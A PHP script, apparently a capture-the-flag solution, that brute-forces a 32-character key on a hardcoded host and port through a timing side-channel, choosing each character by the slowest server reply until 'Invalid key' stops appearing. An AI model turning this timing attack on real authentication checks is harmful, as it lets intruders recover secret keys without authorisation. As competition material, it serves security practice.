<?php

// Coded By Kami@Spiderz
// Demonstration of Time attack
// proMISCuous 300 pts


$host=  "88.87.208.163";
$port=  6969;
$all      = array();
$charset  = range(65,122);

			$cracked="";
			$try=0;
			$final="";

			for($i=1;$i<=32;$i++){
				foreach($charset as $char)
				{
				
				$fp = fsockopen($host, $port);
				$info = stream_get_meta_data($fp);
				$char=chr($char);
				$tmp=$final.$char;
				
				//start counter
				$starttime  = microtime(true);
				fwrite($fp, $tmp."\n");
				$resultat = fgets($fp,1080)."\n";
				$stoptime  = microtime(true); 
				//stop counter 
				
				
				$status = ($stoptime - $starttime) ;
				$morrey = ($status);
				
					if(!@eregi("\x49\x6e\x76\x61\x6c\x69\x64\x20\x6b\x65\x79",$resultat)){
						echo "\r\nCracked : ".$tmp."\n";
						exit(-1);
					}
					
				echo "\r Trying : ".$final.$char." => [".$morrey."]";
				$all[$char]=$morrey; //save all in array
		}

$cracked=array_search(max($all), $all); // $key = 2; compare max value
$final .=$cracked;// save max delai in one table

// echo  $final."\n"; #Disable debugging

 unset($all);
}



?>
